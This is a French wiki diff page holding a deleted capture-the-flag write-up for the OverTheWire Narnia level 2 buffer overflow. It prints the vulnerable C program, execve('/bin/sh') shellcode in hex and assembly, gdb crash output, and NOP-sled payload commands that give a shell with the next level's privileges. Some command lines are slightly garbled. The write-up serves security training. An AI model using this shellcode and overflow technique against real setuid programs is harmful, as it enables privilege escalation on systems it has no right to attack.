Outils d'utilisateurs
overthewire_narnia:level2_-_buffer_overflow
Différences
Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
|
overthewire_narnia:level2_-_buffer_overflow [2013/03/01 19:08] thelizardking effacée |
— (Version actuelle) | ||
|---|---|---|---|
| Ligne 1: | Ligne 1: | ||
| - | ====== Narnia level 2 - Buffer overflow ====== | ||
| - | <code c> | ||
| - | /* | ||
| - | This program is free software; you can redistribute it and/or modify | ||
| - | it under the terms of the GNU General Public License as published by | ||
| - | the Free Software Foundation; either version 2 of the License, or | ||
| - | (at your option) any later version. | ||
| - | |||
| - | This program is distributed in the hope that it will be useful, | ||
| - | but WITHOUT ANY WARRANTY; without even the implied warranty of | ||
| - | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | ||
| - | GNU General Public License for more details. | ||
| - | |||
| - | You should have received a copy of the GNU General Public License | ||
| - | along with this program; if not, write to the Free Software | ||
| - | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA | ||
| - | */ | ||
| - | #include <stdio.h> | ||
| - | #include <string.h> | ||
| - | #include <stdlib.h> | ||
| - | |||
| - | int main(int argc, char * argv[]){ | ||
| - | char buf[128]; | ||
| - | |||
| - | if(argc == 1){ | ||
| - | printf("Usage: %s argument\n", argv[0]); | ||
| - | exit(1); | ||
| - | } | ||
| - | strcpy(buf,argv[1]); | ||
| - | printf("%s", buf); | ||
| - | |||
| - | return 0; | ||
| - | } | ||
| - | </code> | ||
| - | |||
| - | A première vue, on a un simple buffer overflow. On va donc l'exploiter de manière classique. | ||
| - | Le shellcode utilisé ici sera un classique: | ||
| - | <code asm> | ||
| - | ; | ||
| - | ; execve("/bin/sh", {"/bin/sh", NULL}, NULL); | ||
| - | ; \x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80 | ||
| - | ; | ||
| - | xor %eax,%eax | ||
| - | mov $0xb,%al | ||
| - | xor %edx,%edx | ||
| - | push %edx | ||
| - | push $0x68732f6e ; //bin/sh | ||
| - | push $0x69622f2f | ||
| - | mov %esp,%ebx | ||
| - | push %edx | ||
| - | push %ebx | ||
| - | mov %esp,%ecx | ||
| - | int $0x80 | ||
| - | </code> | ||
| - | |||
| - | Un peu de tatonnement permet d'arriver à: | ||
| - | <code> | ||
| - | $ gdb /narnia/narnia2 | ||
| - | (gdb) r `python -c 'print "A"*140 + "B"*4'` | ||
| - | Starting program: /narnia/narnia2 `python -c 'print "A"*140 + "B"*4'` | ||
| - | |||
| - | Program received signal SIGSEGV, Segmentation fault. | ||
| - | 0x42424242 in ?? () | ||
| - | </code> | ||
| - | |||
| - | A partir de là, on lance un classique ret2EGG. | ||
| - | <code>$ cat get_env.c | ||
| - | #include <stdio.h> | ||
| - | #include <unistd.h> | ||
| - | #include <stdlib.h> | ||
| - | |||
| - | int main(int argc, char* argv[]) { | ||
| - | char* env; | ||
| - | |||
| - | if (argc != 2) { | ||
| - | fprintf(stderr, "USAGE %s ENV\n", argv[0]); | ||
| - | exit(1); | ||
| - | } | ||
| - | |||
| - | env = getenv(argv[1]); | ||
| - | |||
| - | if (!env) { | ||
| - | fprintf(stderr, "Env variable %s doesn't exists\n", argv[1]); | ||
| - | exit(2); | ||
| - | } | ||
| - | |||
| - | printf("------- $%s is -------\n%s\n-------- at\n%p\n", argv[1], env, env); | ||
| - | |||
| - | return 0; | ||
| - | } | ||
| - | $ gcc get_env.c -o get_env | ||
| - | $ export EGG=`python -c 'print "\x90"*128 + "\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` | ||
| - | $ ./get_env.c./getenvasnarnia2 EGG | ||
| - | ------- $EGG is ------- | ||
| - | 1À° | ||
| - | 1ÒRhn/shh//biãRSá̀ | ||
| - | -------- at | ||
| - | 0x7fffffffedde EGG | ||
| - | $ /narnia/narnia2 `python -c 'print "\x90"*140 + "\xde\xed\xff\xff\xff\x4f"'` | ||
| - | Segmentation fault | ||
| - | </code> | ||
| - | |||
| - | Soucis... Le problème vient du fait que le wargame tourne sur un machine 64 bits et que le challenge est compilé pour du 32 bits. On s'en rend compte en observant l'adresse de EGG qui devrait être quelque chose come 0xbfff???? sur du 32 bits. | ||
| - | <code>$ uname -a | ||
| - | Linux melissa.labs.overthewire.org 2.6.38-8-virtual #42-Ubuntu SMP Mon Apr 11 04:06:34 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux | ||
| - | $ file /narnia/narnia2 | ||
| - | /narnia/narnia2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped | ||
| - | $ file get_env | ||
| - | getenvasnarnia2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not strippe | ||
| - | </code> | ||
| - | |||
| - | Il suffit de recompiler get_env.c pour du 32 bits et on est bon. | ||
| - | <code> | ||
| - | $ gcc -m32 get_env.c -o get_env | ||
| - | narnia2@melissa:/tmp/nical$ file get_env | ||
| - | get_env: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped | ||
| - | $ ./get_env EGG | ||
| - | ------- $EGG is ------- | ||
| - | 1À° | ||
| - | 1ÒRhn/shh//biãRSá̀ | ||
| - | -------- at | ||
| - | 0xffffddee | ||
| - | $ /narnia/narnia2 `python -c 'print "\x90"*140 + "\xee\xdd\xff\xff"'` | ||
| - | $ id | ||
| - | uid=14002(narnia2) gid=14002(narnia2) euid=14003(narnia3) groups=14003(narnia3),14002(narnia2) | ||
| - | </code> | ||
overthewire_narnia/level2_-_buffer_overflow.1362161321.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)
Outils de la Page
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
